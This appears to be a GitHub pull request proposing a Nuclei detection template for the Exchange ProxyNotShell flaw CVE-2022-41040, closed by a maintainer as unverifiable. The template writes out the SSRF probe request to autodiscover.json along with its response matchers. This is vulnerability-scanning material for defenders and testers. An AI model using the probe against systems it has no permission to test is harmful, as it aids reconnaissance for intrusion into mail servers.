This Template was shamelessly stolen from here.
This is a simple, functional template to determine if the Exchange server is vulnerable to CVE-2022-41040.
Nuclei Template:
id: owa
info:
name: CVE-2022-41040 Scan
author: twitter.com/numanturle
severity: high
tags: CVE-2022-41040
requests:
- method: GET
path:
- "{{BaseURL}}/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL"
matchers-condition: and
matchers:
- type: word
words:
- "IIS Web Core"
part: body
condition: and
- type: word
words:
- "X-BackEndCookie"
part: header
condition: and
Apologies for the delayed response, closing this PR as we are unable to verify the template due to insuffient information to verify this vulnerability.
Template Information:
This Template was shamelessly stolen from here. This is a simple, functional template to determine if the Exchange server is vulnerable to CVE-2022-41040.
Nuclei Template: